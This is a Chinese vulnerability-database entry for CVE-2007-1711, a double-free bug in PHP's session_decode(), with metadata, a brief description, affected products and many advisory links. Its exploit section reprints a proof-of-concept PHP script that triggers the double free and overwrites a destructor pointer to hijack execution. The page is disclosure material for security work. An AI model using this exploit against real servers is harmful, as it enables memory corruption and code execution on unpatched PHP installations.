Apple Mac OS X中php实现漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112562 漏洞类型 设计错误
发布时间 2007-03-27 更新时间 2007-08-01
CVE编号 CVE-2007-1711 CNNVD-ID CNNVD-200703-624
漏洞平台 Linux CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3586
https://www.securityfocus.com/bid/23121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-624
|漏洞详情
MacOSX是苹果家族计算机所使用的操作系统。AppleMacOSX中php实现漏洞PHP的实现上存在多个漏洞,可能导致各种攻击。
|漏洞EXP
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //     PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability     //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  ini_set("session.serialize_handler", "php");
  session_start();

  $varname = str_repeat("D", 39);
  $$varname = &$_SESSION;

  // Trigger the double free
  
  session_decode($varname.'|i:0;');
  $_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
  $_________________a = array("OneElement");

  // Now x and a point to the same memory. Therefore x can be used to modify a

  // Overwrite pointer to the destructor  
  $_________________x[8*4+0] = chr(0x55);
  $_________________x[8*4+1] = chr(0x66);
  $_________________x[8*4+2] = chr(0x77);
  $_________________x[8*4+3] = chr(0x88);
  
  // Trigger the destruction
  unset($_________________a);
?>

# milw0rm.com [2007-03-27]
|受影响的产品
Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux 10 F... TurboLinux Personal TurboLinux Mu
|参考资料

来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1268
来源:BID
名称:23121
链接:http://www.securityfocus.com/bid/23121
来源:BUGTRAQ
名称:20070418rPSA-2007-0073-1phpphp-mysqlphp-pgsql
链接:http://www.securityfocus.com/archive/1/archive/1/466166/100/0/threaded
来源:MISC
链接:http://www.php-security.org/MOPB/MOPB-32-2007.html
来源:DEBIAN
名称:DSA-1283
链接:http://www.debian.org/security/2007/dsa-1283
来源:DEBIAN
名称:DSA-1282
链接:http://www.debian.org/security/2007/dsa-1282
来源:SECUNIA
名称:25062
链接:http://secunia.com/advisories/25062
来源:SECUNIA
名称:25025
链接:http://secunia.com/advisories/25025
来源:SECUNIA
名称:24945
链接:http://secunia.com/advisories/24945
来源:SECUNIA
名称:24941
链接:http://secunia.com/advisories/24941
来源:SECUNIA
名称:24924
链接:http://secunia.com/advisories/24924
来源:SECUNIA
名称:24910
链接:http://secunia.com/advisories/24910
来源:REDHAT
名称:RHSA-2007:0163
链接:http://rhn.redhat.com/errata/RHSA-2007-0163.html
来源:REDHAT
名称:RHSA-2007:0155
链接:http://rhn.redhat.com/errata/RHSA-2007-0155.html
来源:REDHAT
名称:RHSA-2007:0154